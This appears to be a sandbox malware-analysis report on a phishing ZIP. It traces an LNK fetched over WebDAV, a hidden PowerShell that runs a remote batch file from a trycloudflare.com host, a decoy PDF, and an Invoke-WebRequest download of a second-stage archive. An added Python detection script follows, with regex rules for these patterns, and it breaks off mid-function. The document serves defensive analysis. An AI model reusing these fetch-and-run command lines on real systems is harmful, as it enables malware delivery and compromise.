Source: unknown HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58426 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.209.166:443 -> 192.168.2.17:58428 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58430 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58435 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.17:58442 version: TLS 1.2

System Summary

Source: C:\Program Files\Google\Chrome\Application\chrome.exe File dump: C:\Users\user\Downloads\BestellungVRG020002.zip (copy)
Source: classification engine Classification label: mal68.spyw.evad.win@50/61@6/7
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ka0uob4e.cto.ps1
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
Source: C:\Windows\System32\conhost.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1912,i,9342714929990700637,7957857642515349934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0"
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1564,i,7782112262489688426,12990874366865501672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Google Drive.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\crash_reporter.cfg
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BF64EC64 pushad ; iretd 36_2_00007FF9BF64EC65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BF6461DA push ds; ret 36_2_00007FF9BF64621F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BF6442D0 push esp; iretd 36_2_00007FF9BF644319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BF6442B5 push esp; iretd 36_2_00007FF9BF644319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BFB2D0D0 pushad ; retf 36_2_00007FF9BFB359DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BFC784A5 pushad ; iretd 36_2_00007FF9BFC784F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BFC763C5 push edi; iretd 36_2_00007FF9BFC763E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BFC76365 push edi; iretd 36_2_00007FF9BFC763E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BFC7DAF0 push esp; retf 36_2_00007FF9BFC7DAF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BFC7D6DF pushfd ; iretd 36_2_00007FF9BFC7D6E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF9BFC784E0 pushad ; iretd 36_2_00007FF9BFC784F2
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX (10 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (72 identical events)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (26 identical events)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX (3 identical events)
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX (2 identical events)
Source: C:\Windows\System32\timeout.exe Process information set: NOOPENFILEERRORBOX (2 identical events)
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX (7 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (81 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 1472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2323
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7369
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1048 Thread sleep count: 3164 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5136 Thread sleep count: 269 > 30
Source: C:\Windows\System32\timeout.exe TID: 2424 Thread sleep count: 39 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4068 Thread sleep count: 2323 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4068 Thread sleep count: 7369 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Note: 922337203685477 ms equals TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10,000), so these thread delays are indefinite waits rather than a fixed timer, and the negative sleep times reported for TIDs 2680 and 1096 are likewise far outside any real timeout value. Read the sleep-related signatures in the overview with that in mind: the one fixed, script-chosen delay in this trace is the timeout /t 5 in the batch chain.
Source: cmd.exe, 0000001E.00000003.2318311250.0000025D62B3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000011.00000002.1551843850.000001EC8FB93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B537B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: cmd.exe, 0000001E.00000003.2318311250.0000025D62B3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\G
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686564000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2407822609.0000013E4F8CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: rundll32.exe, 00000018.00000002.1742704031.0000028904A24000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -outfile 'c:\users\user\downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\conhost.exe Queries volume information: \Device\Mup\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\bestellung-DKM00392pdf.lnk VolumeInformation
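The process chain above (a hidden PowerShell running a .bat over a WebDAV UNC path on a trycloudflare.com host, a decoy PDF opened from Downloads, a five-second timeout, then a second PowerShell fetching toto.zip from another trycloudflare.com host, all reached through a .lnk served from the same WebDAV share) is the sequence a detection engineer would encode as a rule over process-creation telemetry. The script below is an added example, not part of the Joe Sandbox output: it scores a constructed process tree whose command lines are the ones listed in this report (the explorer.exe root, the PIDs, the cmd.exe standing in for the LNK launcher and the two benign control processes are assumptions) and extracts the tunnel hostnames, download URL and dropped file as indicators.

```python
"""Score a process tree for the WebDAV / Cloudflare-tunnel launch chain in this
report. Added example: event layout, PIDs and the benign control processes are
assumptions; the command lines are the ones listed in the report."""
import re

# Rule name -> (pattern over the command line, weight).
RULES = {
    # \\host@SSL\DavWWWRoot\... is the WebClient (WebDAV) redirector pulling a
    # file from an HTTPS server, the usual way to run a script "from a share".
    "webdav_unc": (re.compile(r"\\\\[^\\\s'\"]+@ssl\\davwwwroot", re.I), 4),
    # A script or binary executed directly off that share.
    "remote_script": (re.compile(r"davwwwroot\\[^\s'\"]*\.(?:bat|cmd|vbs|js|ps1|exe|dll)\b", re.I), 3),
    # Free Cloudflare quick-tunnel hostnames carry both stages of the chain.
    "cloudflare_tunnel": (re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I), 3),
    "ps_hidden": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "ps_download": (re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I), 3),
    # The scripted pause between the decoy document and the payload fetch.
    "timeout_delay": (re.compile(r"\btimeout(?:\.exe)?\s+/t\s+\d+", re.I), 1),
}
ALERT_THRESHOLD = 5

HOST_RX = re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I)
UNC_HOST_RX = re.compile(r"\\\\([^\\\s'\"@]+)@ssl\\", re.I)
URL_RX = re.compile(r"https?://[^\s'\"]+", re.I)
OUTFILE_RX = re.compile(r"-outfile\s+'([^']+)'", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed process-creation events. The explorer.exe root, the PIDs and
# pids 80/90 (benign controls) are invented; the cmd.exe at pid 20 stands in
# for the LNK's launcher, whose command line the report does not show.
SAMPLE_EVENTS = [
    dict(pid=10, ppid=1, image=r"C:\Windows\explorer.exe", cmdline="explorer.exe"),
    dict(pid=20, ppid=10, image=CMD, cmdline="cmd.exe"),
    dict(pid=30, ppid=20, image=PS, cmdline=r'''powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"'''),
    dict(pid=40, ppid=30, image=CMD, cmdline=r'''"C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze'''),
    dict(pid=50, ppid=40, image=r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe", cmdline=r'''"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"'''),
    dict(pid=60, ppid=40, image=r"C:\Windows\System32\timeout.exe", cmdline="timeout /t 5"),
    dict(pid=70, ppid=40, image=PS, cmdline=r'''powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"'''),
    dict(pid=80, ppid=10, image=PS, cmdline='powershell.exe -NoProfile -Command "Get-Date"'),
    dict(pid=90, ppid=10, image=CMD, cmdline=r"cmd.exe /c dir \\fileserver\share"),
]

def match_rules(cmdline):
    """Names of all rules whose pattern hits this command line."""
    return [name for name, (rx, _) in RULES.items() if rx.search(cmdline)]

def ancestors(pid, by_pid):
    """Parent PIDs from nearest to root; stops on unknown or cyclic parents."""
    chain, seen = [], {pid}
    while pid in by_pid:
        pid = by_pid[pid]["ppid"]
        if pid in seen or pid not in by_pid:
            break
        chain.append(pid)
        seen.add(pid)
    return chain

def triage(events):
    """Per-PID score: own rule weights plus half the best score among its
    ancestors, so the decoy PDF and the timeout spawned by a flagged cmd.exe
    surface next to the launcher instead of passing as ordinary processes."""
    by_pid = {e["pid"]: e for e in events}
    own = {}
    for e in events:
        hits = match_rules(e["cmdline"])
        own[e["pid"]] = (hits, sum(RULES[h][1] for h in hits))
    result = {}
    for e in events:
        hits, score = own[e["pid"]]
        inherited = max((own[a][1] for a in ancestors(e["pid"], by_pid)), default=0)
        total = score + inherited // 2
        result[e["pid"]] = {
            "image": e["image"].rsplit("\\", 1)[-1],
            "rules": hits,
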